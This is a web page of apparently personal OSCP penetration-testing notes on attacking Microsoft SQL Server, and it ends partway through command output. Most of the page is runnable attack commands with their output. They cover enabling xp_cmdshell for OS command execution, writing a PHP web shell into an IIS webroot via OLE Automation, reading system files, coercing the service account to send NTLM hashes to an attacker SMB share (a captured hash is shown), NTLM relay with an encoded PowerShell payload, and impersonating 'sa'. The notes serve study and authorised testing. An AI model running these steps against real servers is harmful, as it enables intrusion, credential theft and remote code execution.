<!doctype html><html lang=en-us dir=ltr itemscope itemtype=http://schema.org/Article data-r-output-format=html><head><meta charset=utf-8><meta name=viewport content="height=device-height,width=device-width,initial-scale=1,minimum-scale=1"><meta name=generator content="Hugo 0.131.0"><meta name=generator content="Relearn 8.2.0"><meta name=description content="MSSQL default system schemas/databases:
master - keeps the information for an instance of SQL Server. msdb - used by SQL Server Agent. model - a template database copied for each new database. resource - a read-only database that keeps system objects visible in every database on the server in sys schema. tempdb - keeps temporary objects for SQL queries Privileges Depending on the user’s privileges, we may be able to perform different actions within a SQL Server, such as:"><meta name=author content><meta name=twitter:card content="summary"><meta name=twitter:title content="mssql :: DrakonOps"><meta name=twitter:description content="MSSQL default system schemas/databases:
master - keeps the information for an instance of SQL Server. msdb - used by SQL Server Agent. model - a template database copied for each new database. resource - a read-only database that keeps system objects visible in every database on the server in sys schema. tempdb - keeps temporary objects for SQL queries Privileges Depending on the user’s privileges, we may be able to perform different actions within a SQL Server, such as:"><meta property="og:url" content="https://irfan123456789-hub.github.io/DrakonOps/oscp-notes/mssql/index.html"><meta property="og:site_name" content="DrakonOps"><meta property="og:title" content="mssql :: DrakonOps"><meta property="og:description" content="MSSQL default system schemas/databases:
master - keeps the information for an instance of SQL Server. msdb - used by SQL Server Agent. model - a template database copied for each new database. resource - a read-only database that keeps system objects visible in every database on the server in sys schema. tempdb - keeps temporary objects for SQL queries Privileges Depending on the user’s privileges, we may be able to perform different actions within a SQL Server, such as:"><meta property="og:locale" content="en_us"><meta property="og:type" content="article"><meta property="article:section" content="OSCP Notes"><meta itemprop=name content="mssql :: DrakonOps"><meta itemprop=description content="MSSQL default system schemas/databases:
master - keeps the information for an instance of SQL Server. msdb - used by SQL Server Agent. model - a template database copied for each new database. resource - a read-only database that keeps system objects visible in every database on the server in sys schema. tempdb - keeps temporary objects for SQL queries Privileges Depending on the user’s privileges, we may be able to perform different actions within a SQL Server, such as:"><meta itemprop=wordCount content="1987"><title>mssql :: DrakonOps</title>
<link href=../../images/logo.png?1762045204 rel=icon type=image/png><link href=../../DrakonOps/css/auto-complete/auto-complete.min.css?1762045204 rel=stylesheet><script src=../../DrakonOps/js/auto-complete/auto-complete.min.js?1762045204 defer></script><script src=../../DrakonOps/js/search-lunr.min.js?1762045204 defer></script><script src=../../DrakonOps/js/search.min.js?1762045204 defer></script><script>window.relearn=window.relearn||{},window.relearn.index_js_url="../../searchindex.en.js?1762045204"</script><script src=../../DrakonOps/js/lunr/lunr.min.js?1762045204 defer></script><script src=../../DrakonOps/js/lunr/lunr.stemmer.support.min.js?1762045204 defer></script><script src=../../DrakonOps/js/lunr/lunr.multi.min.js?1762045204 defer></script><script src=../../DrakonOps/js/lunr/lunr.en.min.js?1762045204 defer></script><script>window.relearn=window.relearn||{},window.relearn.contentLangs=["en"]</script><link href=../../DrakonOps/fonts/fontawesome/css/fontawesome-all.min.css?1762045204 rel=stylesheet media=print onload='this.media="all",this.onload=null'><noscript><link href=../../DrakonOps/fonts/fontawesome/css/fontawesome-all.min.css?1762045204 rel=stylesheet></noscript><link href=../../DrakonOps/css/perfect-scrollbar/perfect-scrollbar.min.css?1762045204 rel=stylesheet><link href=../../css/theme.min.css?1762045204 rel=stylesheet><link href=../../css/format-html.min.css?1762045204 rel=stylesheet id=R-format-style><script>window.relearn=window.relearn||{},window.relearn.min=`.min`,window.relearn.path="/oscp-notes/mssql/index.html",window.relearn.relBasePath="../..",window.relearn.relBaseUri="../..",window.relearn.absBaseUri="https://irfan123456789-hub.github.io/DrakonOps",window.relearn.disableAnchorCopy=!1,window.relearn.disableAnchorScrolling=!1,window.relearn.disableInlineCopyToClipboard=!1,window.relearn.enableBlockCodeWrap=!0,window.relearn.getItem=(e,t)=>e.getItem(t),window.relearn.setItem=(e,t,n)=>e.setItem(t,n),window.relearn.removeItem=(e,t)=>e.removeItem(t),window.T_Copy_to_clipboard=`Copy to clipboard`,window.T_Copied_to_clipboard=`Copied to clipboard!`,window.T_Copy_link_to_clipboard=`Copy link to clipboard`,window.T_Link_copied_to_clipboard=`Copied link to clipboard!`,window.T_Reset_view=`Reset view`,window.T_View_reset=`View reset!`,window.T_No_results_found=`No results found for "{0}"`,window.T_N_results_found=`{1} results found for "{0}"`,window.relearn.themevariants=["zen-dark"],window.relearn.customvariantname="my-custom-variant",window.relearn.changeVariant=function(e){var t=document.documentElement.dataset.rThemeVariant;window.relearn.setItem(window.localStorage,window.relearn.absBaseUri+"/variant",e),document.documentElement.dataset.rThemeVariant=e,t!=e&&(document.dispatchEvent(new CustomEvent("themeVariantLoaded",{detail:{variant:e,oldVariant:t}})),window.relearn.markVariant())},window.relearn.markVariant=function(){var e=window.relearn.getItem(window.localStorage,window.relearn.absBaseUri+"/variant");document.querySelectorAll(".R-variantswitcher select").forEach(t=>{t.value=e})},window.relearn.initVariant=function(){var e=window.relearn.getItem(window.localStorage,window.relearn.absBaseUri+"/variant")??"";e==window.relearn.customvariantname||(!e||!window.relearn.themevariants.includes(e))&&(e=window.relearn.themevariants[0],window.relearn.setItem(window.localStorage,window.relearn.absBaseUri+"/variant",e)),document.documentElement.dataset.rThemeVariant=e},window.relearn.initVariant(),window.relearn.markVariant()</script><link href=../../DrakonOps/css/custom.css?1762045204 rel=stylesheet></head><body class="mobile-support html" data-url=../../oscp-notes/mssql/index.html><div id=R-body class=default-animation><div id=R-body-overlay></div><nav id=R-topbar><div class=topbar-wrapper><div class=topbar-sidebar-divider></div><div class="topbar-area topbar-area-start" data-area=start><div class="topbar-button topbar-button-sidebar" data-content-empty=disable data-width-s=show data-width-m=hide data-width-l=hide><span class="btn cstyle link noborder notitle interactive"><button onclick=toggleNav() type=button title="Menu (CTRL+ALT+n)"><i class="fa-fw fas fa-bars"></i></button></span></div><div class="topbar-button topbar-button-toc" data-content-empty=hide data-width-s=show data-width-m=show data-width-l=show><span class="btn cstyle link noborder notitle interactive"><button onclick=toggleTopbarFlyout(this) type=button title="Table of Contents (CTRL+ALT+t)"><i class="fa-fw fas fa-list-alt"></i></button></span><div class=topbar-content><div class=topbar-content-wrapper><nav class=TableOfContents><ul><li><ul><li></li><li><a href=#1-check-current-configuration>1. <strong>Check Current Configuration</strong></a></li><li><a href=#2-enable-advanced-options>2. <strong>Enable Advanced Options</strong></a></li><li><a href=#3-enable-xp_cmdshell>3. <strong>Enable <code>xp_cmdshell</code></strong></a></li></ul></li><li><a href=#write-local-file>Write Local File</a><ul><li></li></ul></li><li><a href=#capture-mssql-service-hash>Capture MSSQL Service Hash</a><ul><li></li></ul></li><li><a href=#impersonate-existing-users-with-mssql>Impersonate Existing Users with MSSQL</a><ul><li></li></ul></li><li><a href=#sql-server-admin>SQL Server Admin</a><ul><li></li></ul></li><li><a href=#communicate-with-other-databases-with-mssql>Communicate with Other Databases with MSSQL</a><ul><li></li></ul></li></ul></nav></div></div></div></div><ol class="topbar-breadcrumbs breadcrumbs highlightable" itemscope itemtype=http://schema.org/BreadcrumbList><li itemscope itemtype=https://schema.org/ListItem itemprop=itemListElement><a itemprop=item href=../../index.html><span itemprop=name>DrakonOps</span></a><meta itemprop=position content="1">&nbsp;>&nbsp;</li><li itemscope itemtype=https://schema.org/ListItem itemprop=itemListElement><a itemprop=item href=../../oscp-notes/index.html><span itemprop=name>OSCP Notes</span></a><meta itemprop=position content="2">&nbsp;>&nbsp;</li><li itemscope itemtype=https://schema.org/ListItem itemprop=itemListElement><span itemprop=name>mssql</span><meta itemprop=position content="3"></li></ol><div class="topbar-area topbar-area-end" data-area=end><div class="topbar-button topbar-button-prev" data-content-empty=disable data-width-s=show data-width-m=show data-width-l=show><span class="btn cstyle link noborder notitle interactive"><a href=../../oscp-notes/imap-and-pop/index.html title="imap and pop (🡐)"><i class="fa-fw fas fa-chevron-left"></i></a></span></div><div class="topbar-button topbar-button-next" data-content-empty=disable data-width-s=show data-width-m=show data-width-l=show><span class="btn cstyle link noborder notitle interactive"><a href=../../oscp-notes/oracle-databases-tns/index.html title="oracle databases TNS (🡒)"><i class="fa-fw fas fa-chevron-right"></i></a></span></div><div class="topbar-button topbar-button-more" data-content-empty=hide data-width-s=show data-width-m=show data-width-l=show><span class="btn cstyle link noborder notitle interactive"><button onclick=toggleTopbarFlyout(this) type=button title=More><i class="fa-fw fas fa-ellipsis-v"></i></button></span><div class=topbar-content><div class=topbar-content-wrapper><div class="topbar-area topbar-area-more" data-area=more></div></div></div></div></div></div></nav><div id=R-main-overlay></div><main id=R-body-inner class="highlightable oscp-notes" tabindex=-1><div class=flex-block-wrapper><article class=default><header class=headline></header><h1 id=mssql>mssql</h1><p><code>MSSQL</code> default system schemas/databases:</p><ul><li><code>master</code> - keeps the information for an instance of SQL Server.</li><li><code>msdb</code> - used by SQL Server Agent.</li><li><code>model</code> - a template database copied for each new database.</li><li><code>resource</code> - a read-only database that keeps system objects visible in every database on the server in sys schema.</li><li><code>tempdb</code> - keeps temporary objects for SQL queries</li></ul><h4 id=privileges>Privileges</h4><p>Depending on the user&rsquo;s privileges, we may be able to perform different actions within a SQL Server, such as:</p><ul><li><p>Read or change the contents of a database</p></li><li><p>Read or change the server configuration</p></li><li><p>Execute commands</p></li><li><p>Read local files</p></li><li><p>Communicate with other databases</p></li><li><p>Capture the local system hash</p></li><li><p>Impersonate existing users</p></li><li><p>Gain access to other networks</p></li></ul><p>In this section, we will explore some of these attacks.</p><h4 id=mssql-databases>MSSQL Databases</h4><p>MSSQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server. Here are the default databases and a brief description of each:</p><table><thead><tr><th>Default System Database</th><th>Description</th></tr></thead><tbody><tr><td><code>master</code></td><td>Tracks all system information for an SQL server instance</td></tr><tr><td><code>model</code></td><td>Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created after changes to the model database</td></tr><tr><td><code>msdb</code></td><td>The SQL Server Agent uses this database to schedule jobs & alerts</td></tr><tr><td><code>tempdb</code></td><td>Stores temporary objects</td></tr><tr><td><code>resource</code></td><td>Read-only database containing system objects included with SQL server</td></tr></tbody></table><p> </p><p>export KRB5CCNAME=/tmp/krb5cc_0<br>python3 mssqlclient.py -windows-auth -k DOMAIN/user@ip</p><p> </p><p> </p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
</span></span></code></pre></div><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>msf6 auxiliary(scanner/mssql/mssql_ping) &gt; set rhosts 10.129.201.248
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>rhosts =&gt; 10.129.201.248
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>msf6 auxiliary(scanner/mssql/mssql_ping) &gt; run
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>[*] 10.129.201.248:       - SQL Server information for 10.129.201.248:
</span></span><span style=display:flex><span>[+] 10.129.201.248:       -    ServerName      = SQL-01
</span></span><span style=display:flex><span>[+] 10.129.201.248:       -    InstanceName    = MSSQLSERVER
</span></span><span style=display:flex><span>[+] 10.129.201.248:       -    IsClustered     = No
</span></span><span style=display:flex><span>[+] 10.129.201.248:       -    Version         = 15.0.2000.5
</span></span><span style=display:flex><span>[+] 10.129.201.248:       -    tcp             = 1433
</span></span><span style=display:flex><span>[+] 10.129.201.248:       -    np              = \SQL-01\pipe\sql\query
</span></span><span style=display:flex><span>[*] 10.129.201.248:       - Scanned 1 of 1 hosts (100% complete)
</span></span><span style=display:flex><span>[*] Auxiliary module exe
</span></span></code></pre></div><p> </p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>SQL&gt; select name from sys.databases;
</span></span><span style=display:flex><span>SELECT name FROM sys.sysdatabases;  //show databases
</span></span><span style=display:flex><span>use databasename;
</span></span><span style=display:flex><span>select name from sys.tables //list show tables
</span></span><span style=display:flex><span>select * from tb_flag;  /print out table
</span></span></code></pre></div><p> </p><p>MSSQL CONNECT FROM LINUX</p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ mssqlclient.py -p 1433 julio@10.129.203.7
</span></span></code></pre></div><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>mssqlclient.py Administrator@10.129.201.248 -windows-auth
</span></span></code></pre></div><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>sqsh -S 10.129.203.7 -U julio -P &#39;MyPassword!&#39; -h
</span></span></code></pre></div><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ sqsh -S 10.129.203.7 -U .\julio -P &#39;MyPassword!&#39; -h
</span></span></code></pre></div><h4 id=from-windows>From windows</h4><h4 id=sqlcmd---connecting-to-the-sql-server>Sqlcmd - Connecting to the SQL Server</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code>C:\local&gt; sqlcmd -S SRVMSSQL -U julio -P &#39;MyPassword!&#39; -y 30 -Y 30

1&gt;</code></pre></div><p> </p><p>If we use <code>sqlcmd</code>, we will need to use <code>GO</code> after our query to execute the SQL syntax.</p><p> </p><p> </p><p>To interact with <a href=https://www.microsoft.com/en-us/sql-server/sql-server-downloads rel=external>MSSQL (Microsoft SQL Server)</a> with Linux we can use <a href=https://en.wikipedia.org/wiki/Sqsh rel=external>sqsh</a> or <a href=https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility rel=external>sqlcmd</a> if you are using Windows</p><p> </p><p> </p><p> </p><p>==<strong>Command execution</strong>==</p><p> </p><h3 id=1-check-current-configuration>1. <strong>Check Current Configuration</strong></h3><p>Run this first to see if <code>xp_cmdshell</code> is already enabled:</p><p>EXEC sp_configure &lsquo;xp_cmdshell&rsquo;;</p><ul><li>If <code>config_value = 0</code>, it&rsquo;s disabled.</li><li>If <code>config_value = 1</code>, it&rsquo;s enabled.</li></ul><p> </p><h3 id=2-enable-advanced-options>2. <strong>Enable Advanced Options</strong></h3><p>By default, SQL Server hides advanced configuration options. Enable them with:</p><p>EXEC sp_configure &lsquo;show advanced options&rsquo;, 1;<br>RECONFIGURE;</p><p> </p><p> </p><h3 id=3-enable-xp_cmdshell>3. <strong>Enable <code>xp_cmdshell</code></strong></h3><p>Now enable <code>xp_cmdshell</code></p><p>EXEC sp_configure &lsquo;xp_cmdshell&rsquo;, 1;<br>RECONFIGURE;</p><p>We could then choose <code>enable_xp_cmdshell</code> to enable the <a href="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15" rel=external>xp_cmdshell stored procedure</a> which allows for one to execute operating system commands via the database if the account in question has the proper access rights.</p><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; xp_cmdshell &#39;whoami&#39;
2&gt; GO

output
-----------------------------
no service\mssql$sqlexpress
NULL
(2 rows affected)</code></pre></div><p> </p><h4 id=windows---sqlcmd>Windows - SQLCMD</h4><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>C:\local&gt; sqlcmd -S 10.129.20.13 -U username -P Password123</code></pre></div><p> </p><h2 id=write-local-file>Write Local File</h2><h4 id=mssql---enable-ole-automation-procedures>MSSQL - Enable Ole Automation Procedures</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; sp_configure &#39;show advanced options&#39;, 1
2&gt; GO
3&gt; RECONFIGURE
4&gt; GO
5&gt; sp_configure &#39;Ole Automation Procedures&#39;, 1
6&gt; GO
7&gt; RECONFIGURE
8&gt; GO</code></pre></div><p> </p><h4 id=mssql---create-a-file>MSSQL - Create a File</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; DECLARE @OLE INT
2&gt; DECLARE @FileID INT
3&gt; EXECUTE sp_OACreate &#39;Scripting.FileSystemObject&#39;, @OLE OUT
4&gt; EXECUTE sp_OAMethod @OLE, &#39;OpenTextFile&#39;, @FileID OUT, &#39;c:\inetpub\wwwroot\webshell.php&#39;, 8, 1
5&gt; EXECUTE sp_OAMethod @FileID, &#39;WriteLine&#39;, Null, &#39;&lt;?php echo shell_exec($_GET[&#34;c&#34;]);?&gt;&#39;
6&gt; EXECUTE sp_OADestroy @FileID
7&gt; EXECUTE sp_OADestroy @OLE
8&gt; GO</code></pre></div><p> </p><p> </p><h4 id=read-local-files-in-mssql>Read Local Files in MSSQL</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; SELECT * FROM OPENROWSET(BULK N&#39;C:/Windows/System32/drivers/etc/hosts&#39;, SINGLE_CLOB) AS Contents
2&gt; GO

BulkColumn

-----------------------------------------------------------------------------
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to hostnames. Each
# entry should be kept on an individual line. The IP address should

(1 rows affected)</code></pre></div><h2 id=capture-mssql-service-hash>Capture MSSQL Service Hash</h2><h4 id=xp_dirtree-hash-stealing>XP_DIRTREE Hash Stealing</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; EXEC master..xp_dirtree(&#39;\\10.10.110.17\share\u0027)
2&gt; GO

subdirectory    depth
--------------- -----------</code></pre></div><p> </p><p>on older systems</p><h4 id=xp_subdirs-hash-stealing>XP_SUBDIRS Hash Stealing</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; EXEC master..xp_subdirs(&#39;\\10.10.110.17\share\u0027)
2&gt; GO

HResult 0x55F6, Level 16, State 1
xp_subdirs could not access &#39;\\10.10.110.17\share\*.*\u0027: FindFirstFile() returned error 5, &#39;Access is de</code></pre></div><h4 id=xp_subdirs-hash-stealing-with-responder>XP_SUBDIRS Hash Stealing with Responder</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ sudo responder -I tun0
</span></span></code></pre></div><p> </p><h4 id=xp_subdirs-hash-stealing-with-impacket>XP_SUBDIRS Hash Stealing with impacket</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>cube111@local[/local]$ sudo impacket-smbserver share ./ -smb2support
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
</span></span><span style=display:flex><span>[*] Config file parsed
</span></span><span style=display:flex><span>[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
</span></span><span style=display:flex><span>[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 
</span></span><span style=display:flex><span>[*] Config file parsed                                                 
</span></span><span style=display:flex><span>[*] Config file parsed                                                 
</span></span><span style=display:flex><span>[*] Config file parsed
</span></span><span style=display:flex><span>[*] Incoming connection (10.129.203.7,49728)
</span></span><span style=display:flex><span>[*] AUTHENTICATE_MESSAGE (WINSRV02\mssqlsvc,WINSRV02)
</span></span><span style=display:flex><span>[*] User WINSRV02\mssqlsvc authenticated successfully                        
</span></span><span style=display:flex><span>[*] demouser::WIN7BOX:5e3ab1c4380b94a1:A18830632D52768440B7E2425C4A7107:0101000000000000009BFFB9DE3DD801D5448EF4D0BA034D0000000002000800510053004700320001001E00570049004E002D003500440050005A0033005200530032004F005800320004003400570049004E002D003500440050005A0033005200530032004F00580013456F0051005300470013456F004C004F00430041004C000300140051005300470013456F004C004F00430041004C000500140051005300470013456F004C004F00430041004C0007000800009BFFB9DE3DD801060004000200000008003000300000000000000000100000000200000ADCA14A9054707D3939B6A5F98CE1F6E5981AC62CEC5BEAD4F6200A35E8AD9170A0010000000000000000000000000000000000009001C0063006900660073002F00740065007300740069006E006700730061000000000000000000
</span></span><span style=display:flex><span>[*] Closing down connection (10.129.203.7,49728)                      
</span></span><span style=display:flex><span>[*] Remaining connections []
</span></span></code></pre></div><p>NTLM RELAY</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code>cube111@local[/local]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c &#39;powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBq
sudo ntlmrelayx.py -t smb://192.168.220.146 -smb2support --shell</code></pre></div><p> </p><h2 id=impersonate-existing-users-with-mssql>Impersonate Existing Users with MSSQL</h2><h4 id=identify-users-that-we-can-impersonate>Identify Users that We Can Impersonate</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; SELECT distinct b.name
2&gt; FROM sys.server_permissions a
3&gt; INNER JOIN sys.server_principals b
4&gt; ON a.grantor_principal_id = b.principal_id
5&gt; WHERE a.permission_name = &#39;IMPERSONATE&#39;
6&gt; GO

name
-----------------------------------------------
sa
ben
valentin

(3 rows affected)</code></pre></div><p> </p><h4 id=verifying-our-current-user-and-role>Verifying our Current User and Role</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; SELECT SYSTEM_USER
2&gt; SELECT IS_SRVROLEMEMBER(&#39;sysadmin&#39;)
3&gt; go

-----------
julio                                                                                                                    

(1 rows affected)

-----------
          0

(1 rows affected)</code></pre></div><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; EXECUTE AS LOGIN = &#39;sa&#39;
2&gt; SELECT SYSTEM_USER
3&gt; SELECT IS_SRVROLEMEMBER(&#39;sysadmin&#39;)
4&gt; GO

-----------
sa

(1 rows affected)

-----------
          1

(1 rows affected)</code></pre></div><p> </p><p><strong>Note:</strong> It&rsquo;s recommended to run <code>EXECUTE AS LOGIN</code> within the master DB, because all users, by default, have access to that database. If a user you are trying to impersonate doesn&rsquo;t have access to the DB you are connecting to it will present an error. Try to move to the master DB using <code>USE master</code>.</p><p>We can now execute any command as a sysadmin as the returned value <code>1</code> indicates. To revert the operation and return to our previous user, we can use the Transact-SQL statement <code>REVERT</code>.</p><p><strong>Note:</strong> If we find a user who is not sysadmin, we can still check if the user has access to other databases or linked servers.</p><p>As the returned value <code>0</code> indicates, we do not have the sysadmin role, but we can impersonate the <code>sa</code> user. Let us impersonate the user and execute the same commands. To impersonate a user, we can use the Transact-SQL statement <code>EXECUTE AS LOGIN</code> and set it to the user we want to impersonate.</p><p> </p><h2 id=sql-server-admin>SQL Server Admin</h2><div class="highlight wrap-code" dir=auto><pre tabindex=0><code>MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]-&gt;(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]-&gt;(c:Computer) RETURN p2</code></pre></div><p> </p><p><a href=#R-image-29cc7ee47ff1d5f51b24158840165e6d class=lightbox-link><img alt=e4b32a0d9708d418c9177f6d9ffc5a00.png class="lazy lightbox figure-image" loading=lazy src=../../resources/e4b32a0d9708d418c9177f6d9ffc5a00.png style=height:auto;width:auto></a>
<a href=javascript:history.back(); class=lightbox-back id=R-image-29cc7ee47ff1d5f51b24158840165e6d><img alt=e4b32a0d9708d418c9177f6d9ffc5a00.png class="lazy lightbox lightbox-image" loading=lazy src=../../resources/e4b32a0d9708d418c9177f6d9ffc5a00.png></a></p><p> </p><p> cypher query</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code>MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]-&gt;(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]-&gt;(c:Computer) RETURN p2</code></pre></div><p> </p><h4 id=enumerating-mssql-instances-with-powerupsql>Enumerating MSSQL Instances with PowerUpSQL</h4><p>Privileged Access</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code>PS C:\local&gt; cd .\PowerUpSQL\
PS C:\local&gt;  Import-Module .\PowerUpSQL.ps1
PS C:\local&gt;  Get-SQLInstanceDomain

ComputerName     : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL
Instance         : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433
DomainAccountSid : 1500000521000170152142291832437223174127203170152400
DomainAccount    : damundsen
DomainAccountCn  : Dana Amundsen
Service          : MSSQLSvc
Spn              : MSSQLSvc/ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL:1433
LastLogon        : 4/6/2022 11:59 AM</code></pre></div><p> </p><p> </p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code>PS C:\local&gt;  Get-SQLQuery -Verbose -Instance &#34;172.16.5.150,1433&#34; -username &#34;inlanefreight\damundsen&#34; -password &#34;SQL1234!&#34; -query &#39;Select @@version&#39;

VERBOSE: 172.16.5.150,1433 : Connection Success.

Column1
-------
Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) ...</code></pre></div><p> </p><p> </p><h4 id=running-mssqlclientpy-against-the-target>Running mssqlclient.py Against the Target</h4><p>Privileged Access</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code>cube111@local[/local]$ mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed database context to &#39;master&#39;.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands</code></pre></div><p> </p><p> </p><p> </p><h4 id=enumerating-our-rights-on-the-system-using-xp_cmdshell>Enumerating our Rights on the System using xp_cmdshell</h4><p>Privileged Access</p><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>xp_cmdshell whoami /priv
</span></span><span style=display:flex><span>output                                                                             
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>--------------------------------------------------------------------------------   
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>NULL                                                                               
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>PRIVILEGES INFORMATION                                                             
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>----------------------                                                             
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>NULL                                                                               
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>Privilege Name                Description                               State      
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>============================= ========================================= ==========
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
